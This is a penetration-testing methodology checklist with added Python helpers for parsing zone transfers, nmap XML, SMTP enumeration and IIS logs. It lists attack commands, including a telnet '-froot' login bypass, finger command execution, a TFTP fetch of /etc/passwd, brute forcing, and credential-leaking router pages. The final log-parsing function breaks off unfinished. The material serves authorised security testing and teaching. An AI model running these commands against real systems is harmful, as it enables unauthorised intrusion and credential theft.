Penetration Testing Framework 0.58

Penetration Testing Framework 0.58, from the mind map: Penetration Testing Framework 0.58

1. X11 port 6000^ open

1.1. X11 Enumeration

1.1.1. List open windows

1.1.2. Authentication method: xauth (MIT-MAGIC-COOKIE) or xhost (host-based)

1.2. X11 Exploitation

1.2.1. xwd: xwd -display <IP>:0 -root -out <file.xwd> (dumps the root window of an open display)

1.2.2. Keystrokes: received / transmitted

1.2.3. Screenshots

1.2.4. xhost + (access control disabled; any host may connect to the display)

1.3. Examine Configuration Files

1.3.1. /etc/Xn.hosts

1.3.2. /usr/lib/X11/xdm

1.3.3. /usr/lib/X11/xdm/xsession

1.3.4. /usr/lib/X11/xdm/xsession-remote

1.3.5. /usr/lib/X11/xdm/xsession.0

1.3.6. /usr/lib/X11/xdm/xdm-config DisplayManager*authorize:on

2. pwdump [-h][-o][-u][-p] machineName

3. Nabil contributed the AS/400 section.

4. Client Side Security

5. Back end files

5.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

6. Set objShell = CreateObject("WScript.Shell")

7. Check visible areas for sensitive information.

8. InitialProgram=c:\windows\system32\cmd.exe

9. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt


11. Pre-Inspection Visit - template

12. Network Footprinting (Reconnaissance). The tester attempts to gather as much information as possible about the selected network. Reconnaissance takes two forms, passive and active. Passive reconnaissance is the best starting point, because it normally does not trigger intrusion detection systems or the other protections afforded to the network; it usually means collecting publicly available information with a web browser, from newsgroups and similar sources. Active reconnaissance is more intrusive and may show up in audit logs; an attempted DNS zone transfer or a social engineering attack are examples.

12.1. Untitled

12.1.1. Authoritative bodies: IANA - Internet Assigned Numbers Authority; ICANN - Internet Corporation for Assigned Names and Numbers; NRO - Number Resource Organisation; RIR - Regional Internet Registry; AFRINIC - African Network Information Centre; APNIC - Asia Pacific Network Information Centre; ARIN - American Registry for Internet Numbers; LACNIC - Latin America & Caribbean Network Information Centre; RIPE NCC - Réseaux IP Européens Network Coordination Centre

12.1.2. Websites: Central Ops (Domain Dossier, Email Dossier); DNS Stuff (online DNS one-stop shop, able to perform a great many disparate DNS queries); Fixed Orbit (Autonomous System lookups and other online tools); Geektools; IP2Location (limited free IP lookups showing geolocation, ISP details and other pertinent information); Kartoo (metasearch engine that presents its results visually); an excellent site giving details of shared domains on the queried IP and, conversely, IP-to-DNS resolution, plus a second site that can be used if the first is down; Netcraft (online search tool for host information); Passive DNS Replication (finds shared domains for supplied IP addresses; this is the site used by the nmap hostmap.nse script); Robtex (DNS and AS lookups with a graphical display of pointers, A and MX records and AS connectivity; can be unreliable with old entries, so verify with CentralOps); a site listing a large number of links to online traceroute resources; Wayback Machine (stores older versions of websites, a good comparison tool and an excellent resource for previously removed data)

12.1.3. Tools: Cheops-ng; Country whois; Domain Research Tool; Firefox plugins (AS Number, Shazou, Firecat Suite); Gnetutil; Goolag Scanner; Greenwich; Maltego; GTWhois; Sam Spade; Smart whois; SpiderFoot

12.2. Internet Search

12.2.1. General information: Web Investigator; Tracesmart; Friends Reunited; eBay (profiles etc.)

12.2.2. Financial: EDGAR (company information, including real-time filings; US); Google Finance (general finance portal); Hoovers (business intelligence, insight and results; US and UK); Companies House (UK); Land Registry (UK)

12.2.3. Phone book / electoral roll information: 123people; Electoral Roll Search (UK); 411 (online White Pages and Yellow Pages; US); a background-check service offering phone number lookup, email tracing, criminal records, people finding, cell phone number search and licence plate search (US); UK residential and business directories; Pipl; Spokeo; Yasni; Zabasearch (people search engine; US)

12.2.4. Generic web searching: code search; forum entries; Google Hacking Database; Google (email addresses, contact details); newsgroups/forums; blog search (Yammer, Google Blog Search, Technorati, Jaiku, Twitter); Network Browser; search engine comparison/aggregator sites (Clusty, Grokker, Zuula, Exalead, Delicious)

12.2.5. Metadata search: metadata visualisation sites; tools; Wikipedia metadata search

12.2.6. Social/business networks, by region: Africa, Australia, Belgium, Holland, Hungary, Iran, Japan, Korea, Poland, Russia, Sweden, UK, US, assorted

12.2.7. Resources OSINT International Directory of Search Engines

12.3. DNS record retrieval from publicly available servers

12.3.1. Types of records: SOA - start of authority; names the primary name server for the zone and carries the serial and timer values. MX - the host's or domain's mail exchanger(s). NS - the host's or domain's name server(s). A - address record mapping a host name to an IPv4 address; every host needs one to be located via DNS. PTR - reverse record mapping an IP address back to a host name. SRV - service location record. HINFO - host information record giving CPU type and operating system. TXT - generic text record. CNAME - canonical name; lets additional names/aliases point at a host. RP - responsible person for the domain.

12.3.2. Server and zone settings: version.bind (server version, a CHAOS-class TXT query); SOA serial, refresh, retry, expiry and minimum TTL

12.3.3. Sub Domains

12.3.4. Internal IP ranges Reverse DNS for IP Range

12.3.5. Zone Transfer
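
Worked example (added here; it is not part of the framework and not the author's code): once a zone transfer succeeds, the output still has to be turned into the items 12.3.1 to 12.3.4 ask for. The function below takes `dig axfr`-style text and groups records by type, pulls the SOA settings, lists the sub-domains and flags A records that leak RFC 1918 address space. The zone text is constructed for this example (example.com and 192.0.2.0/24 are reserved documentation ranges); no real host is queried.

```python
"""Classify records from a zone transfer and pull out what 12.3 asks for."""
import ipaddress
from collections import defaultdict

# Constructed sample in `dig axfr` output format; not real data.
SAMPLE_AXFR = """\
example.com.            3600 IN SOA   ns1.example.com. hostmaster.example.com. 2009031201 7200 900 1209600 3600
example.com.            3600 IN NS    ns1.example.com.
example.com.            3600 IN NS    ns2.example.com.
example.com.            3600 IN MX    10 mail.example.com.
example.com.            3600 IN TXT   "v=spf1 mx -all"
example.com.            3600 IN RP    hostmaster.example.com. .
ns1.example.com.        3600 IN A     192.0.2.53
ns2.example.com.        3600 IN A     192.0.2.54
mail.example.com.       3600 IN A     192.0.2.25
mail.example.com.       3600 IN HINFO "SUN-SPARC" "SOLARIS-8"
www.example.com.        3600 IN CNAME web01.example.com.
web01.example.com.      3600 IN A     192.0.2.80
intranet.example.com.   3600 IN A     10.1.2.3
_ldap._tcp.example.com. 3600 IN SRV   0 100 389 dc01.example.com.
dc01.example.com.       3600 IN A     10.1.2.10
"""

# RFC 1918 space only; ipaddress.is_private would also match the 192.0.2.0/24
# documentation range used in the sample, which is not what 12.3.4 means.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_axfr(text):
    """Parse 'owner TTL class TYPE rdata' lines; comment and blank lines are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split(maxsplit=4)
        if len(parts) < 5 or parts[2] != "IN":
            continue
        owner, ttl, _cls, rtype, rdata = parts
        records.append({"owner": owner.lower(), "ttl": int(ttl), "type": rtype.upper(), "rdata": rdata})
    return records


def by_type(records):
    groups = defaultdict(list)
    for r in records:
        groups[r["type"]].append(r)
    return groups


def soa_settings(records):
    """12.3.2: serial/refresh/retry/expiry/minimum from the SOA record."""
    soa = next(r for r in records if r["type"] == "SOA")
    names = ["primary", "responsible", "serial", "refresh", "retry", "expiry", "minimum"]
    out = dict(zip(names, soa["rdata"].split()))
    for key in names[2:]:
        out[key] = int(out[key])
    return out


def subdomains(records, zone):
    """12.3.3: every owner name below the apex, SRV and CNAME owners included."""
    zone = zone.lower().rstrip(".") + "."
    return sorted({r["owner"] for r in records if r["owner"] != zone and r["owner"].endswith("." + zone)})


def internal_hosts(records):
    """12.3.4: A records pointing into RFC 1918 space, i.e. internal ranges leaked by the zone."""
    leaks = {}
    for r in records:
        if r["type"] == "A":
            addr = ipaddress.ip_address(r["rdata"])
            if any(addr in net for net in RFC1918):
                leaks[r["owner"]] = r["rdata"]
    return leaks


def findings(records):
    """What a tester would write down after reading the transfer."""
    notes = []
    for r in records:
        if r["type"] == "HINFO":
            notes.append(f"HINFO discloses platform for {r['owner']}: {r['rdata']}")
        elif r["type"] == "SRV":
            notes.append(f"SRV advertises a service at {r['owner']} -> {r['rdata'].split()[-1]}")
    for owner, ip in internal_hosts(records).items():
        notes.append(f"internal address leaked: {owner} -> {ip}")
    return notes


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print(soa_settings(recs))
    print(subdomains(recs, "example.com"))
    for note in findings(recs):
        print("-", note)
```

On a real engagement the text comes from `dig @ns1.target axfr target.tld` (or `host -l`), and the same parser works on the output of the brute-forced sub-domain lists in 14.6.2 as long as they are written in the same owner/TTL/class/type/rdata layout.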

12.4. Social Engineering

12.4.1. Remote: phone scenarios (results, contact details); email scenarios (software, results, contact details); other

12.4.2. Local: personas (name, phone, email, business cards); contact details (name, phone number, email, room number, department, role); scenarios (new IT employee, fire inspector); results (maps, satellite imagery, building layouts, other)

12.5. Dumpster Diving

12.5.1. Rubbish Bins

12.5.2. Contract Waste Removal

12.5.3. eBay ex-stock sales, e.g. second-hand hard disks

12.6. Web Site copy

12.6.1. httrack

12.6.2. teleport pro

12.6.3. Black Widow

13. Discovery & Probing. Enumeration serves two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting (TCP/IP stack fingerprinting) is the process of determining the operating system running on a remote host by analysing the packets received from it. It can be done actively (e.g. nmap -O, xprobe2) or passively (e.g. p0f). Passive fingerprinting uses only packets that are received anyway and sends nothing itself. Active fingerprinting is noisy: it sends crafted packets to the remote host and examines the reply, or the lack of one. Different operating systems respond differently to certain packets (the response is governed by the RFCs plus whatever proprietary behaviour the vendor, notably Microsoft, has built into the stack), so custom packets can be sent to tell them apart. The applications served by a host are revealed by its open ports; port scanning builds a picture of what is running so the test can be tailored accordingly.

13.1. Default Port Lists

13.1.1. Windows

13.1.2. *nix

13.2. Enumeration tools and techniques. The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.

13.2.1. General enumeration tools
    nmap:
        nmap -n -A -PN -p- -T aggressive -iL nmap.targetlist -oX nmap.syn.results.xml
        nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
        nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
        nmap -A -sS -PN -n --script all --reason ip_address
        grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
    netcat: nc -v -n IP_Address port ; nc -v -w 2 -z IP_Address port_range/port_number
    amap: amap -bqv IP_Address 80 ; synopsis: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
    xprobe2: xprobe2 ip_address
    sinfp: ./sinfp.pl -i IP_Address -p port
    nbtscan: nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
    hping: hping ip_address
    scanrand: scanrand ip_address:all
    unicornscan: unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:'] IP_ADDRESS/CIDR_NET_MASK:S-E
    netenum: netenum network/netmask timeout
    fping: fping -a -d hostname / (Network/Subnet_Mask)

13.2.2. Firewall-specific tools
    firewalk: firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
    ftester: on host 1 run ./ftestd -i eth0 -v ; on host 2 run ./ftest -f ftest.conf -v -d 0.01 ; then ./freport ftest.log ftestd.log

13.2.3. Default Passwords (examine the list; indexed A to Z plus numeric)

13.3. Active Hosts

13.3.1. Open TCP Ports

13.3.2. Closed TCP Ports

13.3.3. Open UDP Ports

13.3.4. Closed UDP Ports

13.3.5. Service probing: SMTP mail bouncing; banner grabbing (HTTP, HTTPS, SMTP, POP3, FTP, other)

13.3.6. ICMP responses: type 3 (port unreachable), type 8 (echo request), type 13 (timestamp request), type 15 (information request), type 17 (subnet address mask request), responses from the broadcast address

13.3.7. Source Port Scans TCP/UDP 53 (DNS) TCP 20 (FTP Data) TCP 80 (HTTP) TCP/UDP 88 (Kerberos)

13.3.8. Firewall Assessment Firewalk TCP/UDP/ICMP responses

13.3.9. OS Fingerprint
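
Worked example (added here; not part of the framework): the commands in 13.2.1 write nmap results with -oX, and section 13.3 wants them reduced to live hosts, open TCP ports and open UDP ports, with the test "tailored accordingly". The parser below does that reduction from the XML, treats only state="open" as open (closed, filtered and open|filtered are left out so they do not pollute the port list), and maps each open port onto the section of this framework to work through next. The XML is constructed for the example, not a real scan; the addresses, service versions and the OS match are assumptions.

```python
"""Turn nmap -oX output into the 13.3 view: live hosts, open TCP/UDP ports, OS guess."""
import ipaddress
import xml.etree.ElementTree as ET

# Constructed nmap XML (not a real scan); 192.0.2.0/24 is a documentation range.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -n -A -PN -p- -oX nmap.syn.results.xml 192.0.2.8/29">
  <host><status state="up" reason="syn-ack"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="5.3"/></port>
      <port protocol="tcp" portid="23"><state state="closed" reason="reset"/><service name="telnet"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="Apache httpd"/></port>
      <port protocol="udp" portid="161"><state state="open" reason="udp-response"/><service name="snmp"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="95"/></os>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
  </host>
  <host><status state="up" reason="arp-response"/>
    <address addr="192.0.2.12" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139"><state state="open" reason="syn-ack"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open|filtered" reason="no-response"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Open port -> the section of this framework to work through next (from section 14's headings).
CHECKLIST = {
    ("tcp", 13): "14.1 Daytime", ("tcp", 21): "14.2 FTP", ("tcp", 22): "14.3 SSH",
    ("tcp", 23): "14.4 Telnet", ("tcp", 25): "14.5 Sendmail", ("tcp", 53): "14.6 DNS",
    ("udp", 53): "14.6 DNS", ("udp", 69): "14.7 TFTP", ("tcp", 79): "14.8 Finger",
    ("tcp", 80): "14.9 Web", ("tcp", 8080): "14.9 Web", ("tcp", 111): "14.10 Portmapper",
    ("udp", 123): "14.11 NTP", ("tcp", 135): "14.12 NetBIOS", ("tcp", 139): "14.12 NetBIOS",
    ("tcp", 445): "14.12 NetBIOS", ("udp", 161): "14.13 SNMP", ("tcp", 389): "14.14 LDAP",
    ("udp", 500): "14.15 VPN", ("tcp", 1723): "14.15 VPN", ("tcp", 502): "14.16 Modbus",
    ("tcp", 513): "14.17 rlogin", ("tcp", 514): "14.18 rsh", ("tcp", 1433): "14.19 SQL Server",
    ("tcp", 1494): "14.20 Citrix", ("tcp", 1521): "14.21 Oracle", ("tcp", 2049): "14.22 NFS",
    ("tcp", 3306): "14.24 MySQL", ("tcp", 3389): "14.25 RDesktop", ("tcp", 5060): "14.27 SIP",
    ("tcp", 5900): "14.28 VNC", ("tcp", 9100): "14.30 JetDirect",
}


def parse_nmap_xml(xml_text):
    """Return {ip: {"os", "tcp", "udp", "services"}} for hosts nmap reports as up.
    Only state="open" counts; closed, filtered and open|filtered are left out."""
    hosts = {}
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addrs = [a.get("addr") for a in host.findall("address") if a.get("addrtype") in ("ipv4", "ipv6")]
        if not addrs:
            continue
        entry = {"os": None, "tcp": [], "udp": [], "services": {}}
        osmatch = host.find("os/osmatch")
        if osmatch is not None:
            entry["os"] = osmatch.get("name")
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            proto, num = port.get("protocol"), int(port.get("portid"))
            entry[proto].append(num)
            svc = port.find("service")
            if svc is not None:
                entry["services"][(proto, num)] = " ".join(
                    v for v in (svc.get("name"), svc.get("product"), svc.get("version")) if v)
        entry["tcp"].sort()
        entry["udp"].sort()
        hosts[addrs[0]] = entry
    return hosts


def live_hosts(hosts):
    """13.3: active hosts, in address order rather than string order."""
    return sorted(hosts, key=ipaddress.ip_address)


def next_steps(hosts):
    """Map each live host to the framework sections its open ports call for, in port order."""
    plan = {}
    for ip, entry in hosts.items():
        sections = []
        for proto in ("tcp", "udp"):
            for num in entry[proto]:
                section = CHECKLIST.get((proto, num), f"unlisted {proto}/{num}")
                if section not in sections:
                    sections.append(section)
        plan[ip] = sections
    return plan


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_NMAP_XML)
    for ip in live_hosts(found):
        print(ip, found[ip]["os"], "tcp", found[ip]["tcp"], "udp", found[ip]["udp"], "->", next_steps(found)[ip])
```

Feeding it a real file is `parse_nmap_xml(open("nmap.syn.results.xml").read())`; the UDP scan from 13.2.1 can be parsed the same way and merged, since the host keys are plain addresses.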

14. Enumeration

14.1. Daytime port 13 open

14.1.1. nmap nse script daytime

14.2. FTP port 21 open

14.2.1. Fingerprint server: telnet ip_address 21 (banner grab); run ftp ip_address. Check for anonymous access: ftp ip_address, username anonymous (or anon), password any email address, e.g. user@example.com

14.2.2. Password guessing Hydra brute force medusa Brutus

14.2.3. Examine configuration files ftpusers ftp.conf proftpd.conf

14.2.4. MiTM

14.3. SSH port 22 open

14.3.1. Fingerprint server: telnet ip_address 22 (banner grab); scanssh: scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

14.3.2. Password guessing: ssh username@ip_address; guess-who: ./b -l username -h ip_address -p 22 -2 < password_file_location; Hydra brute force; brutessh; Ruby SSH Bruteforcer

14.3.3. Examine configuration files ssh_config sshd_config authorized_keys ssh_known_hosts .shosts

14.3.4. SSH Client programs tunnelier winsshd putty winscp

14.4. Telnet port 23 open

14.4.1. Fingerprint server: telnet ip_address. Common banner list (OS -> banner):
    Solaris 8 -> SunOS 5.8
    Solaris 2.6 -> SunOS 5.6
    Solaris 2.4 or 2.5.1 -> Unix(r) System V Release 4.0 (hostname)
    SunOS 4.1.x -> SunOS Unix (hostname)
    FreeBSD -> FreeBSD/i386 (hostname) (ttyp1)
    NetBSD -> NetBSD/i386 (hostname) (ttyp1)
    OpenBSD -> OpenBSD/i386 (hostname) (ttyp1)
    Red Hat 8.0 -> Red Hat Linux release 8.0 (Psyche)
    Debian 3.0 -> Debian GNU/Linux 3.0 / hostname
    SGI IRIX 6.x -> IRIX (hostname)
    IBM AIX 4.1.x -> AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
    IBM AIX 4.2.x or 4.3.x -> AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
    Nokia IPSO -> IPSO (hostname) (ttyp0)
    Cisco IOS -> User Access Verification
    Livingston ComOS -> ComOS - Livingston PortMaster
    Tool: telnetfp

14.4.2. Password attack: Hydra brute force; Brutus; telnet -l "-froot" hostname (Solaris 10+ in.telnetd -f login bypass)

14.4.3. Examine configuration files /etc/inetd.conf /etc/xinetd.d/telnet /etc/xinetd.d/stelnet

14.5. Sendmail Port 25 open

14.5.1. Fingerprint server telnet ip_address 25 (banner grab)

14.5.2. Mail server testing. Enumerate users: VRFY username (asks the server to confirm a mailbox; 250/251 = exists, 550 = unknown, 252 = server will not say); EXPN alias (expands a mailing list or alias into its member addresses). Mail spoof test: HELO anything / MAIL FROM: spoofed_address / RCPT TO: valid_mail_account / DATA / . / QUIT. Mail relay test: the same sequence with an external MAIL FROM and an external RCPT TO; a 250 reply to the RCPT means the server relays for third parties.

14.5.3. Examine Configuration Files
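
Worked example (added here; not the framework's own code): the 14.5.2 exchanges as a small client plus a constructed Sendmail-like server to run it against offline, so both sides of the dialogue are visible. The client grabs the banner (14.5.1), tries VRFY on a candidate list (treating 252 as inconclusive rather than a hit), expands an alias with EXPN, and runs the relay test by asking for an external recipient from an external sender. The server, its user list, the alias `staff` and the `open_relay` switch are all assumptions made for the example.

```python
"""VRFY/EXPN user enumeration and an open-relay check, with a constructed SMTP server to talk to."""
import socket
import socketserver
import threading


class FakeSMTPHandler(socketserver.StreamRequestHandler):
    """Constructed server: just enough SMTP for the 14.5.2 tests. Not a real MTA."""

    def handle(self):
        srv = self.server
        self.reply(220, "mail.example.com ESMTP Sendmail 8.13.1")
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd in ("HELO", "EHLO"):
                self.reply(250, "mail.example.com Hello")
            elif cmd == "VRFY":
                user = arg.strip("<>").split("@")[0]
                if user in srv.users:
                    self.reply(250, f"{user} <{user}@example.com>")
                else:
                    self.reply(550, "5.1.1 User unknown")
            elif cmd == "EXPN":
                members = srv.aliases.get(arg.strip("<>"))
                if members:
                    for m in members[:-1]:
                        self.wfile.write(f"250-{m}@example.com\r\n".encode())
                    self.reply(250, f"{members[-1]}@example.com")
                else:
                    self.reply(550, "5.1.1 Alias unknown")
            elif cmd == "MAIL":
                self.reply(250, "2.1.0 Sender ok")
            elif cmd == "RCPT":
                rcpt = arg.partition(":")[2].strip().strip("<>")
                if rcpt.lower().endswith("@example.com") or srv.open_relay:
                    self.reply(250, "2.1.5 Recipient ok")
                else:
                    self.reply(554, "5.7.1 Relay access denied")
            elif cmd == "RSET":
                self.reply(250, "2.0.0 Reset state")
            elif cmd == "QUIT":
                self.reply(221, "2.0.0 Bye")
                return
            else:
                self.reply(502, "5.5.2 Command not implemented")

    def reply(self, code, text):
        self.wfile.write(f"{code} {text}\r\n".encode())


def start_fake_smtp(users, aliases, open_relay=False):
    """Bind the constructed server on a random loopback port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSMTPHandler)
    srv.daemon_threads = True
    srv.users, srv.aliases, srv.open_relay = set(users), dict(aliases), open_relay
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


class SMTPProbe:
    """Minimal client: one command in, one (possibly multi-line) reply out."""

    def __init__(self, host, port, timeout=5.0):
        self.sock = socket.create_connection((host, port), timeout)
        self.rfile = self.sock.makefile("rb")
        self.banner = self._read()[0]          # 14.5.1 banner grab
        self.cmd("HELO probe.example.net")

    def _read(self):
        lines = []
        while True:
            line = self.rfile.readline().decode(errors="replace").rstrip("\r\n")
            lines.append(line)
            if len(line) < 4 or line[3] != "-":   # "250-" continues, "250 " ends the reply
                return lines

    def cmd(self, line):
        self.sock.sendall((line + "\r\n").encode())
        return self._read()

    def vrfy(self, user):
        """Reply code only: 250/251 confirmed, 252 inconclusive, 550 unknown."""
        return self.cmd(f"VRFY {user}")[0][:3]

    def expn(self, alias):
        reply = self.cmd(f"EXPN {alias}")
        return [l[4:] for l in reply] if reply[0].startswith("250") else []

    def relay_test(self, mail_from, rcpt_to):
        """True if the server accepts a recipient it is not responsible for: an open relay."""
        self.cmd("RSET")
        self.cmd(f"MAIL FROM:<{mail_from}>")
        accepted = self.cmd(f"RCPT TO:<{rcpt_to}>")[0].startswith("250")
        self.cmd("RSET")
        return accepted

    def close(self):
        self.cmd("QUIT")
        self.sock.close()


def enumerate_users(host, port, candidates):
    """{user: reply code} for every candidate the server did not reject outright."""
    probe = SMTPProbe(host, port)
    found = {u: code for u in candidates if (code := probe.vrfy(u)) in ("250", "251", "252")}
    probe.close()
    return found
```

Against a real target only the client half is used: `SMTPProbe(target, 25)`; the relay test must use a recipient domain the server is not authoritative for, otherwise a 250 only proves local delivery works.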

14.6. DNS port 53 open

14.6.1. Fingerprint server/service
    host: host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server] ; -v verbose format ; -t query type, e.g. A, NS or PTR ; -a same as -t ANY ; -l zone transfer (if allowed) ; -f save to a specified filename
    nslookup: nslookup [-option ...] [host-to-find | - [server]]
    dig: dig [@server] [-b address] [-c class] [-f filename] [-k filename] [-p port#] [-t type] [-x addr] [-y name:key] [-4] [-6] [name] [type] [class] [queryopt...]
    whois: -h use the named host to resolve the query ; -a use ARIN ; -r use RIPE ; -p use APNIC ; -Q perform a quick lookup

14.6.2. DNS enumeration
    BiLE suite (perl scripts): perl <script> [website] [project_name] ; perl <script> [website] [input file] ; perl <script> [input file] [true domain file] [output file] <range> ; perl <script> [input file] [true domain file] [output file] ; perl <script> [input file] [output file] ; perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names] ; perl <script> [ip_address_file] [output_file] ; perl jarf-rev [subnetblock] [nameserver]
    txdns: txdns -rt -t domain_name ; txdns -x 50 -bb domain_name
    nmap NSE scripts: dns-random-srcport, dns-random-txid, dns-recursion, dns-zone-transfer

14.6.3. Examine Configuration Files host.conf resolv.conf named.conf

14.7. TFTP port 69 open

14.7.1. TFTP enumeration: tftp ip_address PUT local_file ; tftp ip_address GET conf.txt (or other files) ; Solarwinds TFTP server ; tftp -i <IP> GET /etc/passwd (old Solaris)

14.7.2. TFTP Bruteforcing TFTP bruteforcer Cisco-Torch

14.8. Finger Port 79 open

14.8.1. User enumeration: finger 'a b c d e f g h' ; finger @ip_address ; finger username@ip_address (and the other user/@host variants) ; finger ** ; finger ; nmap NSE script finger

14.8.2. Command execution (old finger daemons): finger "|/bin/id@ip_address" ; finger "|/bin/ls -a /"

14.8.3. Finger bounce (the query is relayed through an intermediate host): finger username@internal_host@victim ; finger @internal_host@victim

14.9. Web Ports 80,8080 etc. open

14.9.1. Fingerprint server: telnet ip_address port ; Firefox plugins (all; specific)

14.9.2. Crawl website: lynx [options] startfile/URL (options include -traversal -crawl -dump -image_links -source) ; httprint ; Metagoofil -d [domain] -l [no. of results] -f [file type] -o results.html

14.9.3. Web Directory enumeration Nikto nikto [-h target] [options] DirBuster Wikto Goolag Scanner

14.9.4. Vulnerability assessment. Manual tests: default passwords; installed backdoors; method testing; file upload; view page source; input validation checks; automated table and column iteration. Vulnerability scanners: Acunetix, Grendelscan, NStealth, Obiwan III, w3af. Specific applications/server tools: Domino, Joomla, vBulletin, ZyXEL

14.9.5. Proxy Testing Burpsuite Crowbar Interceptor Paros Requester Raw Suru WebScarab

14.9.6. Examine configuration files. Generic: httpd.conf / Windows config files. JBoss: JMX console at http://<IP>:8080/jmx-console/. Joomla: configuration.php, diagnostics.php. Mambo: configuration.php. WordPress: setup-config.php, wp-config.php. ZyXEL: /WAN.html (contains the PPPoE ISP password), /WLAN_General.html and /WLAN.html (contain the WEP key), /rpDyDNS.html (DDNS credentials), /Firewall_DefPolicy.html (firewall), /CF_Keyword.html (content filter), /RemMagWWW.html (remote management), /rpSysAdmin.html (system), /LAN_IP.html (LAN), /NAT_General.html (NAT), /ViewLog.html (logs), /rpFWUpload.html (tools), /DiagGeneral.html (diagnostics), /RemMagSNMP.html (SNMP passwords), /LAN_ClientList.html (current DHCP leases). Config backups.

14.9.7. Examine web server logs: c:\winnt\system32\Logfiles\W3SVC1 ; awk '{print $3,$11}' filename | sort | uniq (the field positions depend on the #Fields: line at the top of the log; check it first)
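
Worked example (added here; not part of the framework): the awk one-liner above assumes fixed column positions, but IIS W3C logs declare their layout in a `#Fields:` line that can change between files and even mid-file. The parser below keys every request by those declared names instead, then does what a tester is looking for in the logs: per-client status counts, clients producing bursts of 404s (a scanner or directory brute-forcer such as the tools in 14.9.3) and hits on the sensitive paths listed in 14.9.6. The log excerpt is constructed for this example; the addresses are from documentation ranges and the threshold of three 404s is an assumption.

```python
"""Parse IIS W3C extended logs by their #Fields: header and pick out scanning activity."""
from collections import Counter, defaultdict

# Constructed log excerpt in IIS 6 W3C format; not from a real server.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-03-12 09:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-03-12 09:00:01 192.0.2.80 GET /default.htm - 80 - 198.51.100.7 Mozilla/4.0+(compatible;+MSIE+7.0) 200 0 0
2009-03-12 09:00:02 192.0.2.80 GET /images/logo.gif - 80 - 198.51.100.7 Mozilla/4.0+(compatible;+MSIE+7.0) 200 0 0
2009-03-12 09:01:10 192.0.2.80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 80 - 203.0.113.9 Mozilla/5.0 404 0 2
2009-03-12 09:01:10 192.0.2.80 GET /_vti_bin/shtml.dll - 80 - 203.0.113.9 Mozilla/5.0 404 0 2
2009-03-12 09:01:11 192.0.2.80 GET /jmx-console/ - 80 - 203.0.113.9 Mozilla/5.0 404 0 2
2009-03-12 09:01:11 192.0.2.80 GET /admin/ - 80 - 203.0.113.9 Mozilla/5.0 401 2 5
2009-03-12 09:01:12 192.0.2.80 GET /backup.zip - 80 - 203.0.113.9 Mozilla/5.0 404 0 2
2009-03-12 09:05:00 192.0.2.80 POST /login.asp - 80 jsmith 198.51.100.7 Mozilla/4.0+(compatible;+MSIE+7.0) 302 0 0
"""

# URI fragments worth a second look; several come from the 14.9.6 list.
SENSITIVE_PATHS = ("/jmx-console", "/_vti_bin", "/scripts/", "/admin", "cmd.exe",
                   ".zip", ".bak", "wp-config", "configuration.php")


def parse_iis_log(text):
    """One dict per request, keyed by the names in the most recent #Fields: line."""
    fields, entries = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # the layout can change mid-file: always re-read it
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")        # IIS encodes spaces inside a field as '+'
        if len(values) != len(fields):
            continue                    # malformed line: do not guess at columns
        entries.append(dict(zip(fields, values)))
    return entries


def summarise(entries, not_found_threshold=3):
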